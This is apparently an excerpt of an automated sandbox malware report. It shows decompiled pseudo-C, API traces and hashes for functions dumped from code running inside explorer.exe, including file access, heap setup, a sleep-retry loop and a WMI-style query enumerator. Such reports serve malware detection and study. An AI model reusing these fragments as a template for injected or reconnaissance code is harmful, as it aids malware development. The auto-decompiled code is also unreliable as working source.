                                                                                                                                                                                              Function 02F8B2FE Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                              			E02F8B2FE(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}




                                                                                                                                                                                              0x02f8b312
                                                                                                                                                                                              0x02f8b315
                                                                                                                                                                                              0x02f8b31a
                                                                                                                                                                                              0x02f8b31e

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,02F8B3E6,00000000,00000400,00000000,00000000,?,02F90BBE,00000000,00000000), ref: 02F8B312
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                              • Opcode ID: 895493d74b6ba35fcc826b8e0ae32ba31b4f5ea43940546b05bfc966f530212e
                                                                                                                                                                                              • Instruction ID: 6a1b5037094307024237a8b3d7b065601704e865292947f276481f15bd3cdd31
                                                                                                                                                                                              • Opcode Fuzzy Hash: 895493d74b6ba35fcc826b8e0ae32ba31b4f5ea43940546b05bfc966f530212e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 01D012B17A0100BEFB2C8B24DC5BFB2339CD700701F21066C7A02EA0E0CA69E969C720
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F88BDE Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F88BDE(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x2f9f900, 8, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                              0x02f88bec
                                                                                                                                                                                              0x02f88bf3

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,?,02F8959D,00000100,?,02F86507), ref: 02F88BEC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                              • Opcode ID: 4b9d81ef33d18468bc0a446c037b93dadd749a01490aca8c1cfcff7d5ada580b
                                                                                                                                                                                              • Instruction ID: 1e8a455de64bcd07c99b9025a4a5313afd3c2a768a5b96bea55707515f20f349
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b9d81ef33d18468bc0a446c037b93dadd749a01490aca8c1cfcff7d5ada580b
                                                                                                                                                                                              • Instruction Fuzzy Hash: C9B092314C020CBBCB011BA1EC05A84BF29F704B91F044410F60C44470CBA2A4309B80
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F88BC9 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F88BC9() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x2f9f900 = _t1;
				return _t1;
			}




                                                                                                                                                                                              0x02f88bd2
                                                                                                                                                                                              0x02f88bd8
                                                                                                                                                                                              0x02f88bdd

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00096000,00000000,02F86502), ref: 02F88BD2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 10892065-0
                                                                                                                                                                                              • Opcode ID: 2162798e9aa281920737ff029271e88c2e54957c5343275b931cc389ef8855e0
                                                                                                                                                                                              • Instruction ID: 0d685e4d4b19d8e684a131d724f658261f32519ac8f39e5036f885ed721a9372
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2162798e9aa281920737ff029271e88c2e54957c5343275b931cc389ef8855e0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DB01270BC13086AE7100B205C07B0075106380F82F100504B615D81D0D7E120209904
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F90B23 Relevance: 1.4, APIs: 1, Instructions: 115sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                              			E02F90B23(void* __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t27;
				char _t28;
				intOrPtr _t30;
				void* _t32;
				void* _t37;
				char _t38;
				intOrPtr _t39;
				char _t42;
				intOrPtr _t51;
				intOrPtr* _t61;
				intOrPtr _t64;
				signed int _t71;
				void* _t75;
				void* _t78;
				void* _t79;

				_t27 =  *0x2f9f7e4; // 0x508fb48
				_t28 = E02F88BDE( *((intOrPtr*)(_t27 + 4))); // executed
				_v12 = _t28;
				if(_t28 != 0) {
					_t61 =  *0x2f9f7e4; // 0x508fb48
					if( *((intOrPtr*)(_t61 + 4)) > 0x400) {
						E02F88CBB(_t28,  *_t61, 0x400);
						_v8 = _v8 & 0x00000000;
						_t37 = E02F8109A(_t61, 0x294);
						_t64 =  *0x2f9f81c; // 0x2fb0000
						asm("sbb ecx, ecx");
						_t38 = E02F89DF2(( ~( *(_t64 + 0xa8)) & 0x00000a0b) + 0xf8, ( ~( *(_t64 + 0xa8)) & 0x00000a0b) + 0xf8);
						_push(0);
						_push(_t37);
						_v24 = _t38;
						_push(0x2f9c9a0);
						_push(_t38);
						_t39 =  *0x2f9f81c; // 0x2fb0000
						_push(0x2f9c9a0);
						_v20 = E02F89A5A(_t39 + 0x1020);
						_t42 = E02F8B3C7(_t41,  &_v8); // executed
						_v16 = _t42;
						E02F88BAF( &_v24);
						E02F88BAF( &_v20);
						_t73 = _v16;
						_t79 = _t78 + 0x3c;
						_t71 = _v8;
						if(_v16 != 0 && _t71 > 0x400) {
							_t51 =  *0x2f9f7e4; // 0x508fb48
							if(_t71 >=  *(_t51 + 4)) {
								_t71 =  *(_t51 + 4);
							}
							E02F88CBB(_v12 + 0x400, _t73 + 0x400, _t71 - 0x400);
							_t71 = _v8;
							_t79 = _t79 + 0xc;
						}
						E02F88BF4( &_v16, _t71);
						E02F88BF4( &_v20, 0xfffffffe);
						_t28 = _v12;
						_t78 = _t79 + 0x10;
					}
					_t75 = 0;
					while(1) {
						_t30 =  *0x2f9f81c; // 0x2fb0000
						_t32 = E02F8B467(_t30 + 0x228, _t28, 0x1000); // executed
						_t78 = _t78 + 0xc;
						if(_t32 >= 0) {
							break;
						}
						Sleep(1);
						_t75 = _t75 + 1;
						if(_t75 < 0x2710) {
							_t28 = _v12;
							continue;
						}
						break;
					}
					E02F88BF4( &_v12, 0); // executed
				}
				return 0;
			}























                                                                                                                                                                                              0x02f90b29
                                                                                                                                                                                              0x02f90b31
                                                                                                                                                                                              0x02f90b36
                                                                                                                                                                                              0x02f90b3c
                                                                                                                                                                                              0x02f90b42
                                                                                                                                                                                              0x02f90b52
                                                                                                                                                                                              0x02f90b5c
                                                                                                                                                                                              0x02f90b61
                                                                                                                                                                                              0x02f90b6a
                                                                                                                                                                                              0x02f90b6f
                                                                                                                                                                                              0x02f90b7f
                                                                                                                                                                                              0x02f90b8e
                                                                                                                                                                                              0x02f90b93
                                                                                                                                                                                              0x02f90b95
                                                                                                                                                                                              0x02f90b9b
                                                                                                                                                                                              0x02f90b9e
                                                                                                                                                                                              0x02f90b9f
                                                                                                                                                                                              0x02f90ba0
                                                                                                                                                                                              0x02f90ba5
                                                                                                                                                                                              0x02f90bb4
                                                                                                                                                                                              0x02f90bb9
                                                                                                                                                                                              0x02f90bbe
                                                                                                                                                                                              0x02f90bc5
                                                                                                                                                                                              0x02f90bce
                                                                                                                                                                                              0x02f90bd3
                                                                                                                                                                                              0x02f90bd6
                                                                                                                                                                                              0x02f90bd9
                                                                                                                                                                                              0x02f90bde
                                                                                                                                                                                              0x02f90be4
                                                                                                                                                                                              0x02f90bec
                                                                                                                                                                                              0x02f90bee
                                                                                                                                                                                              0x02f90bee
                                                                                                                                                                                              0x02f90c08
                                                                                                                                                                                              0x02f90c0d
                                                                                                                                                                                              0x02f90c10
                                                                                                                                                                                              0x02f90c10
                                                                                                                                                                                              0x02f90c18
                                                                                                                                                                                              0x02f90c23
                                                                                                                                                                                              0x02f90c28
                                                                                                                                                                                              0x02f90c2b
                                                                                                                                                                                              0x02f90c2b
                                                                                                                                                                                              0x02f90c2e
                                                                                                                                                                                              0x02f90c30
                                                                                                                                                                                              0x02f90c36
                                                                                                                                                                                              0x02f90c41
                                                                                                                                                                                              0x02f90c46
                                                                                                                                                                                              0x02f90c4b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f90c54
                                                                                                                                                                                              0x02f90c5a
                                                                                                                                                                                              0x02f90c61
                                                                                                                                                                                              0x02f90c63
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f90c63
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f90c61
                                                                                                                                                                                              0x02f90c6e
                                                                                                                                                                                              0x02f90c76
                                                                                                                                                                                              0x02f90c7a

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 02F88BDE: RtlAllocateHeap.NTDLL(00000008,?,?,02F8959D,00000100,?,02F86507), ref: 02F88BEC
                                                                                                                                                                                              • Sleep.KERNELBASE(00000001,?,00000000,00000000,?,?,?,?,02F90A51,?,?,?,02F90E19,00000000), ref: 02F90C54
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateHeapSleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4201116106-0
                                                                                                                                                                                              • Opcode ID: 498b6302ce9be5ea929d5869e5c9fdce9f7fbb79aed55769d37cd122262dcf06
                                                                                                                                                                                              • Instruction ID: b86190741b61d5635fa6bd2e1116511bbf9786a16ec22d1bf2fea2e1d433ee52
                                                                                                                                                                                              • Opcode Fuzzy Hash: 498b6302ce9be5ea929d5869e5c9fdce9f7fbb79aed55769d37cd122262dcf06
                                                                                                                                                                                              • Instruction Fuzzy Hash: B04183B1E00109ABEB14EBA4CC85FEEF7A9EF44384F544669E705E7280DA35A905CB54
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F86247 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                              			E02F86247(void* __ecx, void* __eflags) {
				void* _t2;
				WCHAR* _t3;
				WCHAR* _t4;
				intOrPtr _t6;
				signed int _t8;
				WCHAR* _t10;
				void* _t11;
				void* _t12;
				intOrPtr _t14;

				_t2 = E02F85CE2(__eflags); // executed
				if(_t2 == 0) {
					_t14 =  *0x2f9f81c; // 0x2fb0000
					_t3 = E02F85EDD( *((intOrPtr*)(_t14 + 0xac)), 0, __eflags); // executed
					 *0x2f9f840 = _t3;
					__eflags = _t3;
					if(_t3 != 0) {
						_t4 = E02F8A9D6();
						__eflags = _t4;
						if(_t4 == 0) {
							__eflags = 0;
							return 0;
						} else {
							_t6 =  *0x2f9f81c; // 0x2fb0000
							_t8 = lstrcmpiW(_t6 + 0x228, _t4);
							asm("sbb eax, eax");
							_t10 =  ~_t8 + 1;
							__eflags = _t10;
							return _t10;
						}
					} else {
						_t11 = 2;
						return _t11;
					}
				} else {
					_t12 = 3;
					return _t12;
				}
			}












                                                                                                                                                                                              0x02f86247
                                                                                                                                                                                              0x02f8624e
                                                                                                                                                                                              0x02f86254
                                                                                                                                                                                              0x02f86262
                                                                                                                                                                                              0x02f86267
                                                                                                                                                                                              0x02f8626c
                                                                                                                                                                                              0x02f8626e
                                                                                                                                                                                              0x02f86274
                                                                                                                                                                                              0x02f86279
                                                                                                                                                                                              0x02f8627b
                                                                                                                                                                                              0x02f86295
                                                                                                                                                                                              0x02f86297
                                                                                                                                                                                              0x02f8627d
                                                                                                                                                                                              0x02f8627e
                                                                                                                                                                                              0x02f86289
                                                                                                                                                                                              0x02f86291
                                                                                                                                                                                              0x02f86293
                                                                                                                                                                                              0x02f86293
                                                                                                                                                                                              0x02f86294
                                                                                                                                                                                              0x02f86294
                                                                                                                                                                                              0x02f86270
                                                                                                                                                                                              0x02f86272
                                                                                                                                                                                              0x02f86273
                                                                                                                                                                                              0x02f86273
                                                                                                                                                                                              0x02f86250
                                                                                                                                                                                              0x02f86252
                                                                                                                                                                                              0x02f86253
                                                                                                                                                                                              0x02f86253

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 8237c9edbfa64e39d87d4788b78997a1343b49d3b4accef4479dab4415b7e4d6
                                                                                                                                                                                              • Instruction ID: 0d9a1068e161d897bcb0bb06a9199ae2d5cd674504e87c05ec0a66202674c73a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8237c9edbfa64e39d87d4788b78997a1343b49d3b4accef4479dab4415b7e4d6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 17E092B0F912055BEF60BB39EC58F22F3DEAB813C5F258AB0A215DA084EF20C411D900
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                              Function 02F8EA4A Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                              			E02F8EA4A(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E02F8E400(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E02F88BDE(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E02F88BF4( &_v60, 0xfffffffe);
					E02F8E4B4( &_v104);
					return _t320;
				}
				_t165 = E02F89DF2(_t255, 0x3a7);
				 *_t328 = 0xae7;
				_v52 = _t165;
				_t166 = E02F89DF2(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E02F89A5A(_t165);
				_v60 = _t322;
				E02F88BAF( &_v52);
				E02F88BAF( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E02F89DF2(_t255, 0x886);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E02F88BAF( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E02F88BF4( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E02F898BD(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E02F898BD(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E02F88C72(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E02F88BDE( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E02F88BF4(_t136, 0);
								E02F88BF4( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E02F898BD(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E02F89DF2(_t281, 0xb28);
								 *_t329 = 0x83f;
								_t217 = E02F89DF2(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E02F88BDE(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E02F88BAF( &_v92);
											E02F88BAF( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E02F89E51();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E02F88BDE(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E02F89DF2(_t283, 0xe0a);
										E02F89E51( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E02F88BAF( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E02F898BD(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E02F8E92E( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E02F88BF4( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































                                                                                                                                                                                              0x02f8ea53
                                                                                                                                                                                              0x02f8ea59
                                                                                                                                                                                              0x02f8ea60
                                                                                                                                                                                              0x02f8ea63
                                                                                                                                                                                              0x02f8ea66
                                                                                                                                                                                              0x02f8ea6b
                                                                                                                                                                                              0x02f8ea6d
                                                                                                                                                                                              0x02f8ea72
                                                                                                                                                                                              0x02f8eeba
                                                                                                                                                                                              0x02f8eeba
                                                                                                                                                                                              0x02f8ea7f
                                                                                                                                                                                              0x02f8ea81
                                                                                                                                                                                              0x02f8ea84
                                                                                                                                                                                              0x02f8ea87
                                                                                                                                                                                              0x02f8ee9f
                                                                                                                                                                                              0x02f8eea5
                                                                                                                                                                                              0x02f8eeaf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8eeb4
                                                                                                                                                                                              0x02f8ea92
                                                                                                                                                                                              0x02f8ea99
                                                                                                                                                                                              0x02f8eaa0
                                                                                                                                                                                              0x02f8eaa3
                                                                                                                                                                                              0x02f8eaa8
                                                                                                                                                                                              0x02f8eaaa
                                                                                                                                                                                              0x02f8eaad
                                                                                                                                                                                              0x02f8eab0
                                                                                                                                                                                              0x02f8eab1
                                                                                                                                                                                              0x02f8eaba
                                                                                                                                                                                              0x02f8eac0
                                                                                                                                                                                              0x02f8eac3
                                                                                                                                                                                              0x02f8eacc
                                                                                                                                                                                              0x02f8ead1
                                                                                                                                                                                              0x02f8ead6
                                                                                                                                                                                              0x02f8eaed
                                                                                                                                                                                              0x02f8eafa
                                                                                                                                                                                              0x02f8eafd
                                                                                                                                                                                              0x02f8eb04
                                                                                                                                                                                              0x02f8eb09
                                                                                                                                                                                              0x02f8eb10
                                                                                                                                                                                              0x02f8eb15
                                                                                                                                                                                              0x02f8eb1c
                                                                                                                                                                                              0x02f8eb1e
                                                                                                                                                                                              0x02f8eb2a
                                                                                                                                                                                              0x02f8eb2d
                                                                                                                                                                                              0x02f8eb2f
                                                                                                                                                                                              0x02f8ee8f
                                                                                                                                                                                              0x02f8ee90
                                                                                                                                                                                              0x02f8ee99
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ee99
                                                                                                                                                                                              0x02f8eb35
                                                                                                                                                                                              0x02f8eb38
                                                                                                                                                                                              0x02f8eb3b
                                                                                                                                                                                              0x02f8eb3e
                                                                                                                                                                                              0x02f8eb40
                                                                                                                                                                                              0x02f8ee5b
                                                                                                                                                                                              0x02f8ee5e
                                                                                                                                                                                              0x02f8ee61
                                                                                                                                                                                              0x02f8ee63
                                                                                                                                                                                              0x02f8ee85
                                                                                                                                                                                              0x02f8ee8a
                                                                                                                                                                                              0x02f8ee65
                                                                                                                                                                                              0x02f8ee68
                                                                                                                                                                                              0x02f8ee73
                                                                                                                                                                                              0x02f8ee7a
                                                                                                                                                                                              0x02f8ee7a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8eb46
                                                                                                                                                                                              0x02f8eb46
                                                                                                                                                                                              0x02f8eb58
                                                                                                                                                                                              0x02f8eb5b
                                                                                                                                                                                              0x02f8eb5d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8eb65
                                                                                                                                                                                              0x02f8eb68
                                                                                                                                                                                              0x02f8eb6b
                                                                                                                                                                                              0x02f8eb6e
                                                                                                                                                                                              0x02f8eb71
                                                                                                                                                                                              0x02f8eb74
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8eb7a
                                                                                                                                                                                              0x02f8eb88
                                                                                                                                                                                              0x02f8eb8b
                                                                                                                                                                                              0x02f8eb8d
                                                                                                                                                                                              0x02f8eba6
                                                                                                                                                                                              0x02f8ebb5
                                                                                                                                                                                              0x02f8ebbd
                                                                                                                                                                                              0x02f8ebbd
                                                                                                                                                                                              0x02f8ebc0
                                                                                                                                                                                              0x02f8ebc7
                                                                                                                                                                                              0x02f8ebcb
                                                                                                                                                                                              0x02f8ebd1
                                                                                                                                                                                              0x02f8ebd3
                                                                                                                                                                                              0x02f8ee43
                                                                                                                                                                                              0x02f8ee49
                                                                                                                                                                                              0x02f8ee4f
                                                                                                                                                                                              0x02f8ee52
                                                                                                                                                                                              0x02f8ee52
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ee52
                                                                                                                                                                                              0x02f8ebe2
                                                                                                                                                                                              0x02f8ebf6
                                                                                                                                                                                              0x02f8ebfa
                                                                                                                                                                                              0x02f8ebfc
                                                                                                                                                                                              0x02f8ec01
                                                                                                                                                                                              0x02f8ee10
                                                                                                                                                                                              0x02f8ee16
                                                                                                                                                                                              0x02f8ee21
                                                                                                                                                                                              0x02f8ee2c
                                                                                                                                                                                              0x02f8ee32
                                                                                                                                                                                              0x02f8ee38
                                                                                                                                                                                              0x02f8ee3b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8ee3b
                                                                                                                                                                                              0x02f8ec07
